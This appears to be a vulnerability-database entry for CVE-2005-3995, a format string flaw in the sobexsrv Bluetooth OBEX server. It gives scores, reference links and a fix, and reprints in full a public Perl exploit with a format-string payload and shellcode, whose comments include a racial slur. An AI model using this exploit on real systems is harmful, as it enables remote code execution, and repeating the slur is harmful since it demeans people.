CVE-2005-3995
CVSS 5.1
Published: 2005-12-04 19:03:00
Revised: 2011-03-07 21:27:31

[Original] Format string vulnerability in the dosyslog function in the OBEX server (obexsrv.c) for Sobexsrv before 1.0.0-pre4, when the syslog (-S) function is enabled, allows remote attackers to execute arbitrary code via format string specifiers in file name arguments to OBEX commands.


[CNNVD] Sobexsrv Dosyslog remote format string handling vulnerability (CNNVD-200512-068)

        sobexsrv is a flexible, secure Bluetooth OBEX server.
        A format string handling vulnerability exists in sobexsrv's Dosyslog function. An attacker who successfully exploits it can cause a denial of service or execute arbitrary code remotely.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3995
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3995
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-068
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/15692
(PATCH)  BID  15692
http://www.digitalmunition.com/DMA%5B2005-1202a%5D.txt
(VENDOR_ADVISORY)  MISC  http://www.digitalmunition.com/DMA%5B2005-1202a%5D.txt
http://www.vupen.com/english/advisories/2005/2711
(UNKNOWN)  VUPEN  ADV-2005-2711
http://www.securityfocus.com/archive/1/archive/1/418515/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051203 DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'

- Vulnerability information

Sobexsrv Dosyslog remote format string handling vulnerability
Medium risk  Format string
2005-12-04 00:00:00 2012-12-26 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade that fixes this security issue; the patch can be obtained from:
        http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz

- Vulnerability information (1355)

sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit (EDBID:1355)
linux remote
2005-12-03 Verified
Kevin Finisterre
#!/usr/bin/perl
# 
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch! 
#
$retloc = 0x8053418;   # Due to unicode the filename is NOT usable. Must use file contents. 

# R_386_JUMP_SLOT exit()
$addy  = "\x5a\x19\x05\x08";
$addy2 = "\x58\x19\x05\x08";

$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;

$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;

#print "hi: $hi\n";
#print "lo: $lo\n";

$string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200;
#print $string . "\n";

$sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35".
"\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e".
"\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56".
"\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30".
"\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56".
"\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35".
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";

open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);

system($string);

# milw0rm.com [2005-12-03]

- Vulnerability information

21567
sobexsrv -S Parameter Format String Arbitrary Command Execution
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-12-02 2005-11-03
2005-12-02 Unknown

- Solution

Upgrade to version 1.0.0.pre4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete
About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE; their official data sources are kept on MITRE's websites